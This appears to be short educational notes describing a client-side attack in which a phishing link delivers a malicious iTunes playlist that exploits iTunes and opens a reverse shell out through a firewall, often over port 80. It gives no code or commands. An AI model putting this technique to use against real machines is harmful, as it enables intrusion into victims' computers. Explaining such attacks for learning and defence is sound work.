Reverse Shell iTunes Exploit

A client-side attack where an attacker, in iTunes, sends a specially crafted playlist that allows for full control of the target machine

How it works

1. The target receives a phishing email and clicks on a malicious link that downloads the iTunes playlist

\

2. In actuality, the playlist has nothing to do with iTunes

\

 3. It's a link to a malicious iTunes playlist that compromises iTunes

    \  4. The attacker is relying on the popularity of iTunes and the likelihood that the target has it installed on their machine

    \  5. Once that exploit is sent, the payload is delivered and a reverse shell is initiated from the victim back out to the attacker

    \  6. The attacker can't directly connect to the target because the target is behind a firewall, which doesn't allow connections from the outside

    \  7. However, firewalls do allow connections from the inside-out

    \  8. As part of the initial payload, the target's machine automatically connects to a pre-configured IP address on the Internet where the attacker can catch that connection coming in

    \  9. This technique is called a Reverse Shell

    \

10. More often than not, exploits like these often use TCP port 80 to connect,  since it's a very common port that an attacker can rely on being open on that firewall

\